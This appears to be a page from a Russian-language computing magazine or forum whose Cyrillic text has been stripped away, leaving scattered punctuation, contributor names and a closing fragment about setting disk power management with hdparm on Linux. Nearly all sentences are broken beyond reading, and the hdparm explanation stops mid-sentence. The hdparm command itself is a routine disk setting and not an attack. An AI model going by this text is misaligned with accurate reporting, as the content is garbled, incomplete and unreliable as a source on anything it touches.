    : , ,

    , , -

    , , ,

    .


    , moroz ([email protected]) . - .

    ([email protected]) - , .

    , Kir Rost ([email protected]). - , ([email protected]).

    . . , glowren ([email protected]).

    ([email protected]) .


    , , , ([email protected]) - .

    , , ([email protected]) .

    ([email protected]) .

    ua ([email protected]) - .

    ([email protected]) .

    , Robert Schweppes ([email protected]) .


  • ,

    . 20

    ,

    .

    .

    j1M

    >> unixoid

    - . ( ) , - . , Linux , . hdparm:

    # hdparm -B 1 -S 12 /dev/sda

    -B 1 . 254 : 1 127 ,